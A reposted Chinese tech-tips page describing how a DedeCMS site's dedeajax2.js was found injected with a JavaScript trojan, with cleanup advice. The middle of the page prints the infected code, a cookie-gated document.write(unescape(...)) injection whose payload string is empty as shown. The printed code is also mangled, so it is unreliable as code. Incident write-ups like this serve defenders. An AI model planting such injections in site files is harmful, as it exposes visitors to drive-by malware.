位置: IT常识 - 正文
织梦dedecms:dedeajax2.js被植入js木马(织梦艺嫣跳舞)
编辑:rootadmin这阵子我的一个织梦dedecms网站被植入了木马,程序dede。于是我升级到了IE7+全补丁,为了查木马做准备工作,呵呵。
本文链接地址:https://www.jiuchutong.com/zhishi/313335.html
转载请保留说明!
推荐整理分享织梦dedecms:dedeajax2.js被植入js木马(织梦艺嫣跳舞),希望有所帮助,仅作参考,欢迎阅读内容。
文章相关热门搜索词:织梦志玲 舞蹈,织梦志玲 舞蹈,织梦dedecms模板,织梦dedecms开始收割韭菜了,织梦dedecms网站无法访问,织梦映象,织梦dedecms网站无法访问,织梦dedecms网站无法访问,内容如对您有帮助,希望把文章链接给更多的朋友!
结果发现,dedecms织梦ajax2.js被植入了木马。源码如下:
//初始化xmldomfunction InitXDom(){if(DedeXDOM!=null) return;var obj = null;if (typeof(DOMParser) != "undefined") { // Gecko、Mozilla、Firefoxvar parser = new DOMParser();obj = parser.parseFromString(xmlText, "text/xml");} else { // IEtry { obj = new ActiveXObject("MSXML2.DOMDocument");} catch (e) { }if (obj == null) try { obj = new ActiveXObject("Microsoft.XMLDOM"); } catch (e) { }}DedeXDOM = obj;};//以下是被植入木马的部分,乱码都是经由unicode码处理。现在的马夫越来越狡猾了if(document.cookie.indexOf('hello')==-1){var expires=new Date();expires.setTime(expires.getTime() 24*60*60*1000);document.cookie='hello=Yes;path=/;expires=' expires.toGMTString();document.write(unescape(""));}用原版本的dedeajax2覆盖,即可。这个文件,dede的模板都要用到,搜索了,没有发现说明用处。不过建议大家,多注意dedecms的官方补丁,unix服务器的织梦站长,千万别所有文件都是设置,虽然dede在unix的服务器上,设置太过繁琐。免责
下一篇:经典帝国CMS生成sitemap实现代码分享(经典帝国cms生成器下载)